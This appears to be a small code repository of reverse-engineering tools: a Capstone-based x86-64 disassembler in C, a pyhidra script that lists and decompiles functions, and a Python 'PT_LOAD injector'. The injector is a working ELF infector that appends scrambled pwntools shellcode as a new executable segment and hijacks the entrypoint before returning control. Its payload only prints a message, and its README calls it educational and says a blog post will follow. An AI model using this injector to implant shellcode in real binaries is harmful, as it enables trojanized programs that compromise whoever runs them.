├── C
    └── Disassemble.c
├── ELF-injection
    ├── ELF-injection.py
    └── README.MD
├── Python-Ghidra
    └── PyGhidra.py
└── README.md


/C/Disassemble.c:
--------------------------------------------------------------------------------
 1 | #include <stdlib.h>
 2 | #include <inttypes.h>
 3 | #include <stdio.h>
 4 | #include <capstone/capstone.h>
 5 | 
 6 | #define ANSI_COLOR_RED     "\x1b[31m"
 7 | #define ANSI_COLOR_GREEN   "\x1b[32m"
 8 | #define ANSI_COLOR_RESET   "\x1b[0m"
 9 | 
10 | int main()
11 | {
12 | 	csh handle; // API of capstone
13 | 	cs_insn *insn; // points to all memory
14 | 	size_t count; // count instructions
15 | 	if(cs_open(CS_ARCH_X86, CS_MODE_64, &handle) != CS_ERR_OK){
16 | 		fprintf(stderr, "Error initializing capstone\n");
17 | 	}
18 | 	FILE *file = fopen("register", "rb"); // change the file
19 | 	if(!file){
20 | 		 fprintf(stderr, "Error opening file\n");
21 | 		 cs_close(&handle);
22 | 		 return 1;
23 | 	}
24 | 	fseek(file,0,SEEK_END); // set position
25 | 	long int file_size = ftell(file); // size of the file
26 | 	rewind(file); // reset the file position
27 | 
28 | 	unsigned char *buffer = malloc(file_size); // allocate the memory 
29 | 	fread(buffer, 1, file_size,file); // read 1 byte of file_size
30 | 	fclose(file); // close the file
31 | 
32 | 	count = cs_disasm(handle, buffer, file_size, 0x1000, 0, &insn);
33 | 	if(count > 0){
34 | 		for(size_t i = 0; i<count;i++){
35 | 		 //	 printf("0x%" PRIx64 ":\t%s\t\t%s\n", insn[i].address, insn[i].mnemonic, insn[i].op_str);
36 | 			printf("0x%" PRIx64 ":\t" ANSI_COLOR_GREEN "%s\t\t" ANSI_COLOR_RED "%s" ANSI_COLOR_RESET "\n",
37 |                    insn[i].address, insn[i].mnemonic, insn[i].op_str);
38 | 		}
39 | 		cs_free(insn, count);
40 | 	
41 | 
42 | 	}else{
43 | 		fprintf(stderr,"failed to be disassembled");
44 | 	}
45 | 	// clean
46 | 	cs_close(&handle);
47 | 	free(buffer);
48 | }
49 | 


--------------------------------------------------------------------------------
/ELF-injection/ELF-injection.py:
--------------------------------------------------------------------------------
 1 | import argparse
 2 | import sys
 3 | import lief
 4 | from pwn import *
 5 | from termcolor import colored, cprint
 6 | 
 7 | 
 8 |       
 9 | def prGreen(skk): print("\033[92m {}\033[00m" .format(skk))  
10 | def prRed(skk): print("\033[91m {}\033[00m" .format(skk))    
11 |                                                                                               
12 | def infect(file, output):
13 |     x = True
14 |     prGreen("[+] It has been infected")
15 |     payload   = "dangerous is coming\n"
16 |     evilfile  = lief.parse(file)
17 |     devilcode = asm("mov esi, edx")
18 |     devilcode += asm(pwnlib.shellcraft.i386.write(1, payload, len(payload)))
19 |     devilcode =  pwnlib.encoders.encoder.scramble(devilcode)
20 |     hex_ = hex(evilfile.header.entrypoint)
21 |     devilcode += asm(f"mov esi, edx; push {hex_}; ret")
22 |     print("devilcode size : " ,len(devilcode))   # print the devilcode size 
23 |     # ------------------------------------------------------------------------------------------
24 |     
25 |     segment = lief.ELF.Segment() 
26 |     segment.type =  lief.ELF.SEGMENT_TYPES.LOAD 
27 |     segment.flags = lief.ELF.SEGMENT_FLAGS.X                        
28 |     segment.content = bytearray(devilcode)                          
29 |     segment.alignment = 0x1234                                     #segment alignment in memory.
30 |     evilfile.add(segment)
31 |     
32 |                                                                                   
33 |     prGreen("[+] Segment has been linked to the file")
34 |     # -------------------------------------------------------------------------------------------
35 |     
36 |     
37 |     
38 |     print("The orginal entrypoint: "  ,hex(evilfile.header.entrypoint))            
39 |     
40 |     for x in evilfile.segments:
41 |         if (x.type == lief.ELF.SEGMENT_TYPES.LOAD) and (x.alignment == 0x1234):
42 |             evilfile.header.entrypoint = x.virtual_address                 # write our allignment memory to entrypoint
43 |             break
44 |         
45 |     print("New entrypoint: " ,hex(evilfile.header.entrypoint))    
46 |     
47 |                                                                     
48 |     evilfile.write(output)  
49 |  
50 |         
51 |     
52 |            
53 | 
54 | def main():
55 |     pars = argparse.ArgumentParser()
56 |     pars.add_argument("-f", help="file to be infected", required=True) 
57 |     pars.add_argument("-o", help="the output file")                         
58 |     
59 |     args = pars.parse_args()
60 |     if len(sys.argv) < 2:
61 |         pars.print_help()
62 |         exit(0) 
63 |         
64 |     if not (infect(args.f, args.o)):
65 |         return
66 |     else:
67 |         prRed("[-] It has not been infected")
68 |             
69 |     
70 |      
71 | if __name__ == "__main__":
72 |     main()
73 |         
74 |     
75 | 


--------------------------------------------------------------------------------
/ELF-injection/README.MD:
--------------------------------------------------------------------------------
 1 | # PT_LOAD INJECTOR
 2 | 
 3 | Do not worry I will write a blog about this injection technique.
 4 | Only what you should know is that entrypoint and segments are important to inject your shellcode.
 5 | I have not included reverse shell or something like that. This project is for eductational purposes only.
 6 | 
 7 | As I said the blog will be published soon. Stay tuned!!
 8 | 
 9 | What you need to have to run this code:
10 | 
11 | ```
12 | pip install pwntools 
13 | pip install lief
14 | ```
15 | 
16 | 
17 | ## Video for the demonstration 
18 | 
19 | 
20 | [Screencast from 14-12-2022 21:34:12.webm](https://user-images.githubusercontent.com/116346668/207681621-7029d401-aa45-4382-89f1-228b35c13483.webm)
21 | 
22 | 


--------------------------------------------------------------------------------
/Python-Ghidra/PyGhidra.py:
--------------------------------------------------------------------------------
 1 | import pyhidra
 2 | import sys
 3 | import argparse
 4 | from os.path import exists
 5 | 
 6 | 
 7 | def existfile(file):
 8 |    return(exists(file))
 9 | 
10 | def showfuncAddress(file, address):
11 |     print("\n------List the function with the address------\n")
12 |     with pyhidra.open_program(file) as api:
13 |         from ghidra.app.decompiler.flatapi import FlatDecompilerAPI
14 |         flat_decompiler = FlatDecompilerAPI(api)
15 |         decompile = flat_decompiler.decompile(api.getFunction(flat_decompiler.ToAddr(address)))
16 |         print(decompile)
17 | 
18 | def showandDecompile(file):
19 |     print("\n-------List all the functions and decompile it--------\n")
20 |     with pyhidra.open_program(file) as api:
21 |         from ghidra.app.decompiler.flatapi import FlatDecompilerAPI
22 |         program = api.getCurrentProgram() # start the program
23 |         fm = program.getFunctionManager() # start the function manager
24 |         fx = fm.getFunctions(True) # gets all the function
25 |         for func in fx:
26 |             print("{}".format(func.getName())) # print the functiom
27 |             flat_decompiler = FlatDecompilerAPI(api) # decompile the functions
28 |             decompile = flat_decompiler.decompile(api.getFunction(func.getName())) #Return the name of this function
29 |             try:
30 |                 print(decompile)
31 |             except ghidra.program.model.pcode.Decoder.clear():
32 |                 print("Error has occured")
33 |                 
34 |             
35 | 
36 | def showFunctions(file):
37 |     print("\n---------List all the functions------------\n")
38 |     with pyhidra.open_program(file) as api: # open the program
39 |         program = api.getCurrentProgram() # the program has been started
40 |         fm = program.getFunctionManager()
41 |         fx = fm.getFunctions(True)
42 |         for function in fx:
43 |             print("{}".format(function.getSignature())) # print the functions
44 |     exit(0)
45 |     
46 | def ShowAddress(file, address):
47 |     print("\n------Address with the function------\n")
48 |     with pyhidra.open_program(file) as api:
49 |         from ghidra.app.decompiler.flatapi import FlatDecompilerAPI
50 |         decompile_address = FlatDecompilerAPI(api)
51 |         decompile = decompile_address.decompile(api.getFunctionAt(api.toAddr(address)))
52 |         print(decompile)
53 |                 
54 |                 
55 |         
56 | def main():
57 |     print("Welcome to ghidra with the help of python")
58 |     pars = argparse.ArgumentParser()
59 |     pars.add_argument("--file", help="file name", required=True)
60 |     pars.add_argument("--addr", help="Address of a function", required=False)
61 |     pars.add_argument("--laf", help="List all the functions", required=False,action="store_true")
62 |     pars.add_argument("--lafd", help="List all the functions and decompile it", required=False, action="store_true")
63 |     pars.add_argument("--lfa", help="address with the function", required=False, action="store_true")
64 |     args = pars.parse_args()
65 |     if(len(sys.argv) < 2):
66 |         args.print_help()
67 |         exit(0)
68 |     if(existfile):
69 |         pyhidra.start()
70 |     if(args.laf):
71 |         showFunctions(args.file)
72 |     if(args.addr):
73 |         ShowAddress(args.file, args.addr) # put the address and it will find.
74 |     if(args.lafd):
75 |         showandDecompile(args.file)
76 | 
77 |         
78 | if __name__ == "__main__":
79 |     main()
80 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------